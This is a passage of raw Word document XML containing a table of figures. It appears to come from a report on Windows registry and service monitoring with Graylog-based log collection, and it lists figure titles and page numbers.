        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886344" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.4 Configuration Manager implements a strategy for handling noncontiguous memory buffer problems.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886344 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886345" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.5 Each Windows service is stored as an entry key in the SCM database Registry location</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886345 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886346" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.6 Each service entry key stores many Registry values that specify its information</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886346 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886347" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.7 Graylog working model.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886347 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886348" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.8 The correlation between Graylog server and Graylog Collector Sidecar.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886348 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886349" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.9 Example configuration of Graylog Collector Sidecar.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886349 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886350" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.10 Graylog servers and Elasticsearch servers deployed in Cluster mode.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886350 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886351" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.11 Example of a dashboard.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886351 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886352" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.12 Messages are processed in stream.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886352 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886353" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.1 Registry Monitor architecture diagram</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886353 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886354" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.2 Mechanism for detecting change in registry</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886354 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886355" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.3 Service Monitor Architecture</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886355 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886356" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.4 NotifyServiceStatusChange and APC</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886356 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886357" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.5 Distributed Log Collector Hardware architecture</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886357 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886358" w:history="1">
